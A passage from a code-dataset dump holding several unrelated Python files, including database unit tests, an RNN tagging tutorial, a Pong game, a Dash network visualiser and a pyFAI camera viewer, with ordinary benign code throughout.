url=users.create_logout_url(\"/\")))\n return values\n\n","sub_path":"Documents/Boulot/sunutechgroup/Xadeck-Senegaal-Challenge-1f594f3/handlers/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"650170645","text":"import concurrent\nimport json\nimport sqlite3\nfrom pprint import pprint as pp\n\nimport pytest\n\nfrom modules.commands.data_update.data_update import DataUpdater\nfrom modules.db_config.db_config import DBConfig\n\n\n@pytest.fixture(scope='module')\ndef database():\n \"\"\" Setup of the database before tests \"\"\"\n\n db = DBConfig(\n db_name='/home/przemek/PycharmProjects/movies_db/modules/commands/data_update/test_data_updater/resources/movies_test.sqlite') # Creating new db\n with db.conn:\n db.c.execute(\"\"\"CREATE TABLE IF NOT EXISTS MOVIES (\n ID INTEGER PRIMARY KEY,\n TITLE text,\n YEAR integer, \n RUNTIME text, \n GENRE text, \n DIRECTOR text, \n CAST text, \n WRITER text, \n LANGUAGE text, \n COUNTRY text, \n AWARDS text, \n IMDb_Rating float, \n IMDb_votes integer, \n BOX_OFFICE integer,\n UNIQUE(TITLE));\n \"\"\")\n\n try:\n db.c.execute(\n \"\"\"INSERT INTO MOVIES(TITLE) VALUES ('The Shawshank Redemption')\"\"\")\n db.c.execute(\"\"\"INSERT INTO MOVIES(TITLE) VALUES ('Memento')\"\"\")\n db.c.execute(\"\"\"INSERT INTO MOVIES(TITLE) VALUES ('In Bruges')\"\"\")\n db.c.execute(\"\"\"INSERT INTO MOVIES(TITLE) VALUES ('Gods')\"\"\")\n db.c.execute(\"\"\"INSERT INTO MOVIES(TITLE) VALUES ('The Godfather')\"\"\")\n db.c.execute(\"\"\"INSERT INTO MOVIES(TITLE) VALUES ('Niemategonapewno')\"\"\")\n except sqlite3.IntegrityError:\n pass\n\n yield db\n\n # Teardown - deleting the tested table\n db.c.execute(\"DROP TABLE MOVIES\")\n\n\n@pytest.fixture(scope='module')\ndef data_updater(database):\n \"\"\"\n Setup the data updater class before tests\n :param database:\n :return:\n \"\"\"\n\n # Setup\n data_updater = DataUpdater(db=database)\n yield data_updater\n\n # Teardown\n del data_updater\n\n\n@pytest.fixture(scope='module')\ndef empty_titles(data_updater, database):\n \"\"\"\n Setup the empty titles before tests\n :param data_updater:\n :param database:\n :return:\n \"\"\"\n\n # Setup\n empty_titles = database.execute_statement(data_updater.sql_empty_titles_statement)\n yield empty_titles\n\n # Teardown\n del empty_titles\n\n\n@pytest.fixture(scope='module')\ndef downloaded_data(data_updater, empty_titles):\n \"\"\"\n Setup the downloaded data before tests\n :param empty_titles:\n :param data_updater:\n :return:\n \"\"\"\n\n # Setup\n with concurrent.futures.ThreadPoolExecutor() as executor:\n downloaded_data = executor.map(data_updater.download_data, empty_titles)\n\n yield downloaded_data\n\n # Teardown\n del downloaded_data\n\n\ndef test_empty_titles(empty_titles):\n \"\"\"\n Testing getting the list of empty titles\n :param empty_titles:\n :return:\n \"\"\"\n\n # Testing the results of getting list of empty titles\n assert empty_titles[0]['Title'] == 'The Shawshank Redemption'\n assert empty_titles[1]['Title'] == 'Memento'\n assert empty_titles[2]['Title'] == 'In Bruges'\n assert empty_titles[3]['Title'] == 'Gods'\n assert empty_titles[4]['Title'] == 'The Godfather'\n\n\ndef test_download_data(downloaded_data):\n \"\"\"\n Testing downloading the data using API\n :param downloaded_data:\n :return:\n \"\"\"\n\n # Checking json data corectness\n # Ignore assertion error if imdbVotes doesn't match\n with open(\n 
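# machine-specific absolute path, committed with the original test resources\n            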
'/home/przemek/PycharmProjects/movies_db/modules/commands/data_update/test_data_updater/resources/json_movies.json',\n 'r') as correct_file:\n correct_json = json.load(correct_file)\n assert correct_json == next(downloaded_data)[0]\n\n\ndef test_update_data(data_updater, downloaded_data):\n \"\"\"\n Test inserting the data to db\n :param data_updater:\n :param downloaded_data:\n :return:\n \"\"\"\n results = data_updater.update_data(downloaded_data)\n assert results == [{'Title': 'Memento', 'Status': 'Updated'},\n {'Title': 'In Bruges', 'Status': 'Updated'},\n {'Title': 'Gods', 'Status': 'Updated'},\n {'Title': 'The Godfather', 'Status': 'Updated'},\n {'Error': 'Movie not found!', 'Response': 'False'}]\n","sub_path":"modules/commands/data_update/test_data_updater/test_data_updater.py","file_name":"test_data_updater.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"138077211","text":"\"\"\" Tests for yatsm.config_parser\n\"\"\"\nimport os\n\nfrom yatsm import config_parser\n\n\ndef test_get_envvars():\n truth = {\n 'YATSM': {\n 'algo': 'CCDC',\n 'jobno': '1'\n },\n 'dataset': {\n 'dataset': '/tmp/images.csv',\n 'cache': '/tmp/cache'\n }\n }\n d = {\n 'YATSM': {\n 'algo': 'CCDC',\n 'jobno': '$JOBNO'\n },\n 'dataset': {\n 'dataset': '$ROOTDIR/images.csv',\n 'cache': '$ROOTDIR/cache'\n }\n }\n envvars = {\n 'JOBNO': '1',\n 'ROOTDIR': '/tmp'\n }\n # Backup and replace environment\n backup = os.environ.copy()\n for k in envvars:\n os.environ[k] = envvars[k]\n\n expanded = config_parser.expand_envvars(d)\n\n os.environ.update(backup)\n\n assert truth == expanded\n","sub_path":"tests/test_config_parser.py","file_name":"test_config_parser.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"24136145","text":"#python tutorial08.py ../../data/wiki-en-train.norm_pos ../../data/wiki-en-test.norm result.txt\nimport numpy as np\nimport sys\nfrom collections import defaultdict\n\nclass RNN:\n def __init__(self):\n self.word_ids = defaultdict(lambda:len(self.word_ids))\n self.lab_ids = defaultdict(lambda:len(self.lab_ids))\n self.word_with_lab = []\n self.word_lab_vec = []\n self.nodes = 5\n\n def count_features(self, input_file):\n with open (input_file, \"r\", encoding = \"utf-8\") as input_file:\n for line in input_file:\n for word_with_lab in line.strip().split(\" \"):\n word, lab = word_with_lab.split(\"_\")\n self.word_ids[word]\n self.lab_ids[lab]\n\n def create_net(self):\n self.net = []\n w_rx = np.random.rand(self.nodes, len(self.word_ids))-0.5\n self.net.append(w_rx)\n w_rh = np.random.rand(self.nodes, self.nodes)-0.5\n self.net.append(w_rh)\n b_r = np.random.rand(self.nodes)-0.5\n self.net.append(b_r)\n w_oh = np.random.rand(len(self.lab_ids), self.nodes)-0.5 \n self.net.append(w_oh)\n b_o = np.random.rand(len(self.lab_ids))-0.5\n self.net.append(b_o)\n\n #w_rx = net[0]\n #w_rh = net[1]\n #w_oh = net[3]\n #b_r = net[2]\n #b_o = net[4]\n def forward(self, x):\n h = [0] * len(x)\n p = [0] * len(x)\n y = [0] * len(x)\n for t in range(len(x)):\n if t > 0:\n h[t] = np.tanh(np.dot(self.net[0], x[t]) + np.dot(self.net[1], h[t-1]) + self.net[2])\n else:\n h[t] = np.tanh(np.dot(self.net[0], x[t]) + self.net[2])\n p[t] = self.softmax(np.dot(self.net[3], h[t]) + self.net[4])\n y[t] = np.argmax(p[t])\n return h, p, y\n \n def softmax(self, x):\n a= np.sum(np.exp(x))\n return np.exp(x)/a\n\n def create_onehot(self, 
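# note: parameter 'id' shadows the built-in id(); kept as in the source\n            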
id, size):\n vec = np.zeros(size)\n vec[id] = 1\n return vec\n \n def find_best(self,p):\n y=0\n for i in range(len(p)):\n if p[i] > p[y]:\n y = i\n return y\n\n def gradient(self, x, h, p, y_d):\n Δw_rx = np.zeros_like(self.net[0])\n Δw_rh = np.zeros_like(self.net[1])\n Δb_r = np.zeros_like(self.net[2])\n Δw_oh = np.zeros_like(self.net[3])\n Δb_o = np.zeros_like(self.net[4])\n deltar_d = np.zeros(len(self.net[2]))\n\n for t in range(len(x))[::-1]:\n p_d = y_d\n deltao_d = p_d[t] - p[t]\n Δw_oh += np.outer(deltao_d, h[t])\n Δb_o += deltao_d\n deltar = np.dot(deltar_d, self.net[1])+np.dot(deltao_d,self.net[3])\n deltar_d = deltar * (1 - h[t] ** 2)\n Δw_rx += np.outer( deltar_d, x[t])\n Δb_r += deltar_d\n if t != 0:\n Δw_rh += np.outer(deltar_d, h[t-1])\n return [Δw_rx, Δw_rh, Δb_r, Δw_oh, Δb_o]\n\n def create_features(self, x):\n word_vec = []\n lab_vec = []\n words_labs = x.split(\" \")\n for word_lab in words_labs:\n word, lab = word_lab.split(\"_\")\n word_vec.append(self.create_onehot(self.word_ids[word], len(self.word_ids)))\n lab_vec.append(self.create_onehot(self.lab_ids[lab], len(self.lab_ids)))\n return [word_vec, lab_vec]\n \n def create_features_test(self, x):\n word_vec = []\n words = x.split(\" \")\n for word in words:\n if word in self.word_ids:\n word_vec.append(self.create_onehot(self.word_ids[word], len(self.word_ids)))\n return word_vec\n\n def train(self, input_file1,lr,iter):\n self.count_features(input_file1)\n self.create_net()\n \n for i in range(iter):\n input_file = open (input_file1, \"r\", encoding = \"utf-8\")\n print(i) \n for line in input_file:\n word_vec, lab_vec = self.create_features(line.strip())\n h, p, _ = self.forward(word_vec)\n Δ = self.gradient(word_vec, h, p, lab_vec)\n self.update_weights(Δ, lr)\n input_file.close() \n \n def update_weights(self, Δ, rate):\n Δw_rx, Δw_rh, Δb_r, Δw_oh, Δb_o = Δ\n self.net[0] += rate * Δw_rx\n self.net[1] += rate * Δw_rh\n self.net[2] += rate * Δb_r\n self.net[3] += rate * Δw_oh\n self.net[4] += rate * Δb_o\n \n def test(self, input_file, output_file):\n with open(input_file, \"r\", encoding = \"utf-8\") as input_file,\\\n open(output_file, \"w\", encoding = \"utf-8\") as output_file:\n for line in input_file:\n a = []\n word_vec = self.create_features_test(line.strip())\n _, _, y = self.forward(word_vec)\n for k in range(len(y)):\n for i,j in self.lab_ids.items():\n if j == y[k]:\n a.append(str(i))\n output_file.write(f\"{i} \")\n output_file.write(\"\\n\")\n \nif __name__ == \"__main__\":\n rnn = RNN()\n rnn.train(sys.argv[1],0.01,3)\n rnn.test(sys.argv[2], sys.argv[3])","sub_path":"kobayashi/tutorial08/tutorial08.py","file_name":"tutorial08.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"267159519","text":"from tkinter import *\nimport sys\n\nclass BaseDialog( Toplevel ):\n \"\"\"\n Helper base class for dialogs used in the UI.\n \"\"\"\n\n def __init__(self, parent, title = None, buttons=\"\"):\n \"\"\"\n Constructor\n \"\"\"\n Toplevel.__init__( self, parent )\n self.transient(parent)\n\n if title:\n self.title(title)\n\n self.parent = parent\n self.result = None\n body = Frame(self)\n self.initial_focus = self.body(body)\n body.pack(padx=5, pady=5)\n self.buttonbox(buttons)\n self.grab_set()\n if not self.initial_focus:\n self.initial_focus = self\n self.protocol(\"WM_DELETE_WINDOW\", self.cancel)\n self.geometry(\"+%d+%d\" % (parent.winfo_rootx() + 50,\n parent.winfo_rooty() + 50))\n 
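# modal setup: transient() ties the dialog to its parent, grab_set() captures all input, and wait_window(self) below blocks until the dialog is destroyed\n        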
self.initial_focus.focus_set()\n self.wait_window(self)\n\n def body(self, master):\n # create dialog body. return widget that should have\n # initial focus. this method should be overridden\n pass\n\n def buttonbox(self, buttons):\n # add standard button box. override if you don't want the\n # standard buttons\n box = Frame(self)\n w = Button(box, text=\"OK\", width=40, command=self.ok, default=ACTIVE)\n w.pack(side=LEFT, padx=5, pady=5)\n self.bind(\"\", self.ok)\n box.pack()\n\n def ok(self, event=None):\n if not self.validate():\n self.initial_focus.focus_set() # put focus back\n return\n\n self.withdraw()\n self.update_idletasks()\n self.apply()\n self.cancel()\n\n def cancel(self, event=None):\n # put focus back to the parent window\n self.parent.focus_set()\n self.destroy()\n\n def validate(self):\n return 1 # override\n\n def apply(self):\n pass # override\n\nclass SetupDialog( BaseDialog ):\n \"\"\"\n This class is used to create the setup dialog.\n \"\"\"\n def body(self, master):\n Label(master, justify=LEFT, text=\"Project name: \" ).grid(row=0, column=0)\n Label(master, justify=LEFT, text=\"Name\").grid(row=0, column=1)\n self.e1 = Entry(master)\n self.e1.grid(row=1, column=1)\n return self.e1 # initial focus\n\n def apply(self):\n return 0\n\n\nclass ProjGenDialog( object ):\n \"\"\"\n This class is used to create a simplified user interface for running the regression test suite.\n \"\"\"\n \n def __init__(self, bin_path ):\n \"\"\"\n Constructs the dialog, you can define which executable shal be used.\n @param bin_path [in] Path to assimp binary.\n \"\"\"\n self.width=60\n\n\n def setup(self):\n d = SetupDialog( self.root )\n\n\n def generate(self):\n pass\n \n def quit(self):\n sys.exit(0)\n\n def initUi(self):\n # create the frame with buttons\n self.root = Tk()\n self.root.title( \"OSRE project generator V0.1\")\n self.setup = Button( self.root, text=\"Setup project\", command=self.setup, width = self.width )\n self.generate = Button(self.root, text=\"Generate project\", command=self.generate, width=self.width)\n self.quit = Button( self.root, text=\"Quit\", command=self.quit, width = self.width )\n self.setup.grid(row=0, column=0, sticky=W+E )\n self.generate.grid(row=1, column=0, sticky=W+E)\n self.quit.grid(row=1, column=0, sticky=W + E)\n self.root.mainloop()\n\ndef main():\n project_name = \"\"\n project_dir = \"./\"\n if len(sys.argv) > 1:\n project_name = sys.argv[1]\n\n dlg = ProjGenDialog( project_name )\n dlg.initUi()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/project_generator/project_generator.py","file_name":"project_generator.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"601182057","text":"\nfrom PIL import Image\nimport os\nimport sys\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nfrom torchvision.datasets import VisionDataset\nimport cv2\nimport torchvision.transforms as transforms\n\nbreak_height_width = 32\njump = 300\nroot_main='../data/mnt/d/SIDD_Medium_Srgb/Data/'\nfor root, directories, filenames in os.walk(root_main):\n for filename in filenames:\n print(filename)\n if(\"NOISY\" in filename or \"DS_Store\" in filename):\n continue;\n filename_NOISY =filename.replace(\"GT\" ,\"NOISY\" ,1)\n label_file = os.path.join(root, filename)\n input_file = os.path.join(root ,filename_NOISY)\n print(\"input_file: \" +input_file)\n print(\"label_file: \" +label_file)\n img = 
Image.open(input_file).convert('RGB')\n target = Image.open(label_file).convert('RGB')\n width, height = img.size\n current_start_height = 20\n current_start_width = 20\n count = 1\n while(current_start_height+jump 700:\n if (ball[1] - pos[1] < 75):\n yPush+= 1\n xPush+=1\n xPush*= -1\n yPush*=-1\n else:\n print(\"shit\")\n ball=(250,250)\n gScore+=1\n yPush=-3\n\n#green side\n if ball[0] < 1:\n if ball[1] - pos[1] < 75:\n xPush*=-1\n yPush*=-1\n xPush +=1\n yPush += 3\n \n else:\n rScore+=1\n ball=(250,250)\n yPush= 3\n xPush = 3\n\n#Upper\n if ball[1] < 1:\n yPush= 3\n xPush*=-2\n \n#Lower\n if ball[1] > 500:\n \n yPush = -3\n yPush*=2\n # --- Drawing code should go here\n \n # First, clear the screen to white. Don't put other drawing commands\n # above this, or they will be erased with this command.\n screen.fill(BLACK)\n pygame.draw.rect(screen, RED, [55, 500, 10, 5])\n\n # Draw on the screen a green line from (0, 0) to (100, 100)\n # that is 5 pixels wide.\n pygame.draw.line(screen, GREEN, (0,pos[1]- 50), [0, pos[1] + 50], 7)\n pygame.draw.line(screen, RED, (700,pos[1]- 50), [700, pos[1] + 50] , 7)\n pygame.draw.circle(screen, GREEN, ball, 10)\n\n pygame.draw.circle(screen, RED, (1,500) ,10)\n pygame.draw.circle(screen, GREEN, (700,500) ,10)\n #5.17 Drawing Text\n # select the font to use, size, bold italics\n font = pygame.font.SysFont('Calibri', 25, True, False)\n \n #create image stamp\n '''text = font.render(\"My text\",True,BLACK)'''\n text = font.render(\"Ball[0]: \" + str(ball[0])+\"Ball[1]: \" + str(ball[1]), True, GREEN)\n scores = font.render(\"Player_1: \" + str(gScore)+\" Player_2: \" + str(rScore), True, GREEN)\n\n #print(\"xPush\", xPush)\n #print(\"yPush\", yPush)\n #put the image to the screen at 250x250\n screen.blit(text, [400,25])\n screen.blit(scores, [0,25])\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n \n # --- Limit to 60 frames per second\n clock.tick(30)\n \n# Close the window and quit.\n# If you forget this line, the program will 'hang'\n# on exit if running from IDLE.\npygame.quit()\n\n#pygame.draw.line(self.screen, (95,0,95), pos, (pos[0]-rel[0], pos[1]-rel[1]), 5)\n#line(Surface, color, start_pos, end_pos, width=1) -> Rect\n#circle(Surface, color, pos, radius, width=0) -> Rect\n#pygame.draw.circle(self.screen, (200,250,255), fu, 20)\n","sub_path":"Pong.py","file_name":"Pong.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447012394","text":"\"\"\"\r\nsomething like the living textbook!\r\nDrag the nodes around, while its neighbors move together with it.\r\nHighlighting and de-highlighting the selected node.\r\nAdd and remove nodes.\r\nSome funny bug with highlighting, trying to fix.\r\n\"\"\"\r\n\r\nimport dash\r\nfrom dash.dependencies import Input, Output, State\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\n\r\nfrom dash_network import Network\r\n\r\nimport pandas as pd\r\nimport networkx as nx\r\n\r\ndf = pd.read_csv('data\\edges.csv', delimiter=\"\\t\", header=None)\r\ndf.columns = ['user', 'friend']\r\n\r\n# 'resampling\", for faster proof-of-concept\r\n# df_sample = df.sample(50) # random sample\r\n# df_first_100 = df.head(100) # first 100 (so all centered around person 0)\r\nthe_user_init = [12]\r\ndf_user = df[df.user.isin(the_user_init)] # for the specific users\r\n\r\nG = nx.from_pandas_dataframe(df_user, 'user', 'friend') # make Graph from pandas dataframe\r\nprint('Graph 
made')\r\n\r\ndef find_friends(user, df):\r\n df_u = df[df.user.isin(user)]\r\n graph = nx.from_pandas_dataframe(df_u, 'user', 'friend')\r\n return graph\r\n\r\n\r\n# friends = df_user.friend.values.tolist() + the_user_init\r\n\r\ndef radius_mapper(r):\r\n if r < 20:\r\n return 20\r\n else:\r\n return r\r\n\r\ndef make_network_data(graph):\r\n nodes = [{'id': str(node_id), 'color': 'PowderBlue', 'radius': radius_mapper(len(graph.neighbors(node_id)))} for node_id in graph.nodes()]\r\n links = [{'source': str(edge_id[0]), 'target': str(edge_id[1])} for edge_id in graph.edges()]\r\n return {\r\n 'nodes': nodes,\r\n 'links': links\r\n }\r\n\r\n\r\n# dash part\r\napp = dash.Dash(__name__)\r\n\r\napp.scripts.config.serve_locally = True\r\napp.css.config.serve_locally = True\r\n\r\n# selected_colors = ['#006', '#060', '#600', '#A80', '#A08']\r\n\r\n\r\napp.layout = html.Div([\r\n html.H2('Friendship Network'),\r\n Network(\r\n id='net',\r\n data=make_network_data(G),\r\n width=1000\r\n ),\r\n html.Div([\r\n dcc.Input(id='input-add-id', type='number', value='12'),\r\n dcc.Input(id='input-remove-id', type='number', value=None),\r\n html.Button(id='add-button', n_clicks=0, children='Add'),\r\n html.Button(id='remove-button', n_clicks=0, children='Remove'),\r\n html.Div(id='output-state')\r\n ])\r\n])\r\n\r\n# add and remove nodes\r\ncurrent_users = the_user_init\r\ndef add_nodes(node_id, data):\r\n if node_id in current_users:\r\n return data\r\n else:\r\n current_users.append(int(node_id))\r\n graph = find_friends(current_users, df)\r\n print(current_users)\r\n return make_network_data(graph)\r\n\r\n\r\ndef remove_nodes(node_id, data):\r\n if node_id is None:\r\n return data\r\n elif node_id not in current_users:\r\n return data\r\n else:\r\n current_users.remove(node_id)\r\n graph = find_friends(current_users, df)\r\n print(current_users)\r\n return make_network_data(graph)\r\n\r\nhighlighted_ids = []\r\n# highlight\r\ndef highlight(selected_id, data):\r\n if selected_id == None:\r\n return data\r\n if selected_id != None:\r\n G = find_friends(current_users, df)\r\n data = make_network_data(G)\r\n if int(selected_id) not in highlighted_ids:\r\n highlighted_ids.append(int(selected_id))\r\n print(highlighted_ids)\r\n index = G.nodes().index(int(selected_id))\r\n data['nodes'][index]['color'] = 'pink'\r\n neighbors = G.neighbors(int(selected_id))\r\n for neighbor in neighbors:\r\n if neighbor not in highlighted_ids:\r\n highlighted_ids.append(neighbor)\r\n index_n = G.nodes().index(neighbor)\r\n data['nodes'][index_n]['color'] = 'pink'\r\n else:\r\n highlighted_ids.remove(int(selected_id))\r\n index = G.nodes().index(int(selected_id))\r\n data['nodes'][index]['color'] = 'PowderBlue'\r\n neighbors = G.neighbors(int(selected_id))\r\n for neighbor in neighbors:\r\n if neighbor in highlighted_ids:\r\n highlighted_ids.remove(neighbor)\r\n index_n = G.nodes().index(neighbor)\r\n data['nodes'][index_n]['color'] = 'PowderBlue'\r\n return data\r\n\r\n# callback update graph\r\n@app.callback([Output('net', 'data'),\r\n Output('input-add-id', 'value'),\r\n Output('input-remove-id', 'value')],\r\n [Input('net', 'selectedId'),\r\n Input('add-button', 'n_clicks'),\r\n Input('remove-button', 'n_clicks')],\r\n [State('net', 'data'),\r\n State('input-add-id', 'value'),\r\n State('input-remove-id', 'value')])\r\ndef update_graph(selected_id, n_clicks, n_clicks_2, data, add_node_id, remove_node_id):\r\n clicks = [n_clicks, n_clicks_2] # needs that input to be there\r\n print(add_node_id, remove_node_id)\r\n network = 
data\r\n if add_node_id is not None:\r\n network = add_nodes(add_node_id, data)\r\n if remove_node_id is not None:\r\n network = remove_nodes(remove_node_id, network)\r\n return highlight(selected_id, network), None, None\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)\r\n","sub_path":"01c_drag_add_remover.py","file_name":"01c_drag_add_remover.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"329716741","text":"from distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\nfrom Cython.Build import cythonize\nimport numpy\n\next_modules = Extension(\n \"*\",\n [\"mizzle/*.pyx\"],\n extra_compile_args = [\"-O3\", \"-ffast-math\", \"-march=native\", \"-fopenmp\" ],\n extra_link_args=['-fopenmp'],\n include_dirs=[numpy.get_include()],\n)\n\nsetup(name='mizzle',\n version='0.1',\n description='Hydrates arbitrary metal-oxide surfaces',\n author='Samuel Stenberg',\n author_email='samuel.stenberg@hotmail.com',\n license='MIT',\n packages=['mizzle'],\n install_requires=['argcomplete','numpy','pandas','mdtraj','tqdm', 'scipy', 'radish', 'sphinx_rtd_theme'],\n scripts=['bin/mizzler'],\n include_package_data=True,\n cmdclass = {'build_ext': build_ext},\n ext_modules = cythonize([ext_modules]),\n zip_safe=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"587666247","text":"import numpy as np\nfrom numpy.random import normal\nimport pickle\nimport itertools\nimport zipfile as zf\n\n# float_package = pickle.load(open('flotation_model.pickle', 'rb'))\n# smelt_package = pickle.load(open('smelting_model.pickle', 'rb'))\n\nwith zf.ZipFile('flotation_model.zip') as flotation_model:\n float_package = pickle.load(flotation_model.open('flotation_model.pickle'))\n\nwith zf.ZipFile('smelting_model.zip') as smelting_model:\n smelt_package = pickle.load(smelting_model.open('smelting_model.pickle'))\n\ndef max_prod(package, constraints):\n if package == 'float': package = float_package\n elif package == 'smelt': package = smelt_package\n\n inputs = constraints\n print(constraints)\n\n gridsearch = create_grid(package, inputs) # create all possible permutations of free variables\n\n gridsearch_scaled = package['min_max_scaler'].transform(gridsearch) # Perform pre-processing inputs\n\n output = package['model'].predict(gridsearch_scaled) # Run model prediction\n\n max_index = np.argmax(output) # find index of maximum output (i.e. highest metal concentration)\n\n opt_in = package['min_max_scaler'].inverse_transform(gridsearch_scaled)[max_index] # inverse transform max index\n opt_in = opt_in.tolist() # convert data type\n opt_out = output[max_index].tolist() # convert data type\n\n print(opt_in)\n print(opt_out)\n\n return [round(i, 2) for i in opt_in], round(opt_out, 2)\n\ndef create_grid(package, inputs):\n # This function creates all possible permutations of free-variables. 
This essentially creates a grid search matrix\n # which will be passed to the model.\n\n # Find missing / free variables and generate linear space values between min and max bounds\n gridsearch = []\n linspace = []\n for i, v in enumerate(inputs):\n if v is None:\n low_bound = package['safety_thresh']['Inputs'][0][i]\n high_bound = package['safety_thresh']['Inputs'][1][i]\n linspace.append(np.linspace(low_bound, high_bound, num=20))\n\n # Generate all possible permutations of free variables\n iterations = list(itertools.product(*linspace))\n\n # Generate grid-search array\n for variation in iterations:\n none_index = 0\n temp = inputs[:]\n for i, v in enumerate(inputs):\n if v is None:\n temp[i] = variation[none_index]\n none_index += 1\n gridsearch.append(temp)\n\n gridsearch = np.asarray(gridsearch) # modify data type\n\n return gridsearch\n\nif __name__ == '__main__':\n constraints = [None, None, 397.5, 9.76, 1.67, 2847.0, 488.7, 281.28, 520.4] # Float\n constraints = [None, None, 0.21, 5.3, 5, 650, 280] # Smelt\n opt_in, opt_out = max_prod('smelt', constraints)\n\n","sub_path":"reverseModeling.py","file_name":"reverseModeling.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647568174","text":"#!/usr/bin/python\n\nfrom __future__ import with_statement, print_function\n\"\"\"\npyFAI_lima\n\nA graphical tool (based on PyQt4) for performing azimuthal integration of images coming from a camera.\nNo data are saved !\n\n\"\"\"\n\n__author__ = \"Jerome Kieffer\"\n__contact__ = \"Jerome.Kieffer@ESRF.eu\"\n__license__ = \"GPLv3+\"\n__copyright__ = \"European Synchrotron Radiation Facility, Grenoble, France\"\n__date__ = \"11/10/2013\"\n__satus__ = \"development\"\n\nimport sys\nimport time\nimport signal\nimport threading\nimport numpy\nimport pyFAI.worker\nfrom pyFAI import io\nimport pyopencl\nimport os\nop = os.path\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(\"pyFAI\")\nfrom PyQt4 import QtCore, QtGui, uic\nfrom PyQt4.QtCore import SIGNAL\nimport pyqtgraph as pg\n\n\nUIC = op.join(op.dirname(__file__), \"pyFAI_lima.ui\")\nwindow = None\n\n\nclass DoubleView(QtGui.QWidget):\n def __init__(self, ip=\"192.168.5.19\", fps=30, poni=None, json=None, writer=None, cake=None):\n QtGui.QWidget.__init__(self)\n try:\n uic.loadUi(UIC, self)\n except AttributeError as error:\n logger.error(\"I looks like your installation suffers from this bug: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=697348\")\n raise RuntimeError(\"Please upgrade your installation of PyQt (or apply the patch)\")\n self.ip = str(ip)\n self.fps = float(fps)\n self.label_ip.setText(str(ip))\n self.label_fps.setText(str(fps))\n self.cam = self.iface = self.ctrl = self.acq = None\n self.cam = Basler.Camera(self.ip)\n self.iface = Basler.Interface(self.cam)\n self.ctrl = Core.CtControl(self.iface)\n self.is_playing = False\n self.cake = int(cake)\n self.connect(self.pushButton_play, SIGNAL(\"clicked()\"), self.start_acq)\n self.connect(self.pushButton_stop, SIGNAL(\"clicked()\"), self.stop_acq)\n self.last_frame = None\n self.last = time.time()\n if poni:\n worker = pyFAI.worker.Worker(ai=pyFAI.load(poni))\n elif json:\n worker = pyFAI.worker.Worker()\n worker.setJsonConfig(json)\n else:\n worker = None\n\n self.processLink = LinkPyFAI(worker, writer)\n self.extMgr = self.ctrl.externalOperation()\n self.myOp = self.extMgr.addOp(Core.USER_LINK_TASK, \"pyFAILink\", 0)\n 
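# hook the pyFAI worker into LImA's external-operation chain so each grabbed frame is azimuthally integrated before readout\r\n        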
self.myOp.setLinkTask(self.processLink)\n\n self.callback = StartAcqCallback(self.ctrl, self.processLink)\n self.myOp.registerCallback(self.callback)\n self.timer = QtCore.QTimer()\n self.connect(self.timer, SIGNAL(\"timeout()\"), self.update_img)\n self.writer = writer\n self.dLayout = QtGui.QHBoxLayout(self.frame)\n if self.cake <= 1:\n self.variablePlot = pg.PlotWidget(parent=self.frame)\n else:\n self.variablePlot = pg.ImageView(parent=self.frame)\n self.dLayout.addWidget(self.variablePlot)\n\n def start_acq(self):\n if self.is_playing: return\n self.is_playing = True\n self.acq = self.ctrl.acquisition()\n self.acq.setAcqNbFrames(0)\n self.acq.setAcqExpoTime(1.0 / self.fps)\n self.ctrl.prepareAcq()\n if self.cake != self.processLink._worker.nbpt_azim:\n self.processLink._worker.nbpt_azim = int(self.cake)\n self.ctrl.prepareAcq()\n self.ctrl.startAcq()\n while self.ctrl.getStatus().ImageCounters.LastImageReady < 1:\n time.sleep(0.1)\n self.last_frame = self.ctrl.getStatus().ImageCounters.LastImageReady\n raw_img = self.ctrl.ReadBaseImage().buffer\n fai_img = self.ctrl.ReadImage().buffer\n self.RawImg.setImage(raw_img.T)#, levels=[0, 4096])#, autoLevels=False, autoRange=False)\n if self.cake <= 1:\n for i in self.variablePlot.plotItem.items[:]:\n self.variablePlot.plotItem.removeItem(i)\n self.variablePlot.plot(fai_img[:, 0], fai_img[:, 1])\n\n else:\n self.variablePlot.setImage(fai_img.T)#, levels=[0, 4096])#, autoLevels=False, autoRange=False)\n self.last = time.time()\n self.timer.start(1000.0 / self.fps)\n\n def stop_acq(self):\n if self.is_playing:\n self.is_playing = False\n self.ctrl.stopAcq()\n self.timer.stop()\n\n def update_img(self):\n last_frame = self.ctrl.getStatus().ImageCounters.LastImageReady\n if last_frame == self.last_frame:\n return\n if self.is_playing:\n raw_img = self.ctrl.ReadBaseImage().buffer\n fai_img = self.ctrl.ReadImage().buffer\n self.RawImg.setImage(raw_img.T)#, levels=[0, 4096])#, autoLevels=False, autoRange=False)\n if self.cake <= 1:\n self.variablePlot.plotItem.plot(fai_img[:, 0], fai_img[:, 1])\n 